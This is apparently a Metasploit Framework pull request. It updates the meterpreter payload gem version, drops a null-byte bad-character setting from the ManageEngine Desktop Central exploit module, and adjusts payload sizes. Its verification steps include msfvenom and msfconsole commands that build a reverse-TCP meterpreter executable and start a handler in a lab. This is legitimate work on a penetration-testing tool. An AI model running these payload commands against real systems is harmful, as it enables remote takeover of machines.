### PR TITLE
remove unneeded badchars from payload specification for manageengine_connectionid_write, remove payload debug messages

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -14,7 +14,7 @@ PATH
       metasploit-concern
       metasploit-credential
       metasploit-model
-      metasploit-payloads (= 1.1.25)
+      metasploit-payloads (= 1.1.26)
       metasploit_data_models
       metasploit_payloads-mettle (= 0.0.8)
       msgpack
@@ -168,7 +168,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.1.25)
+    metasploit-payloads (1.1.26)
     metasploit_data_models (2.0.5)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)

--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -65,7 +65,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model'
   # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '1.1.25'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.1.26'
   # Needed for the next-generation POSIX Meterpreter
   spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.0.8'
   # Needed by msfgui and other rpc components

--- a/modules/exploits/windows/http/manageengine_connectionid_write.rb
+++ b/modules/exploits/windows/http/manageengine_connectionid_write.rb
@@ -42,10 +42,6 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           [ 'ManageEngine Desktop Central 9 on Windows', {} ]
         ],
-      'Payload'        =>
-        {
-          'BadChars' => "\x00"
-        },
       'Privileged'     => false,
       'DisclosureDate' => "Dec 14 2015",
       'DefaultTarget'  => 0))

--- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 983599
+  CachedSize = 957999
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

--- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 984643
+  CachedSize = 959043
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

--- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 984643
+  CachedSize = 959043
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

--- a/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 983599
+  CachedSize = 957999
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

--- a/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 983599
+  CachedSize = 957999
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

--- a/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 1217071
+  CachedSize = 1189423
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_http.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 1218115
+  CachedSize = 1190467
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_https.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 1218115
+  CachedSize = 1190467
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 1217071
+  CachedSize = 1189423
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows

--- a/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb
@@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config'
 
 module MetasploitModule
 
-  CachedSize = 1217071
+  CachedSize = 1189423
 
   include Msf::Payload::TransportConfig
   include Msf::Payload::Windows


### PR DESCRIPTION
This fixes #7487 in two ways. Looking at the manageengine_connectionid_write exploit, it did not need to specify badchars, because it encodes its payload as a safe hex string internally anyway. So, removing the specification makes this work again.

But, obviously not every exploit can lift this constraint; we need more. Looks like DEBUG mode got left enabled with rapid7/metasploit-payloads@0cbb86c . It is possible we have a bug in the debug output code, and it turns out that independently disabling this again also fixes the issue.
## Verification

List the steps needed to make sure this thing works
- [x] Bootstrap metasploitable3
- [x] run the exploit per https://github.com/rapid7/metasploitable3/pull/17
- [x] **Verify** that meterpreter stages and executes properly
- [x] try reverse_tcp meterpreter payload with a null badchars specification, e.g.:

```
./msfvenom -p windows/meterpreter/reverse_tcp -f exe -o ../metasploitable3/test.exe LHOST=192.168.1.1 -b '\x00'
./msfconsole -qx 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.1; run'
```
- [x] **Verify** that meterpreter stages and executes properly
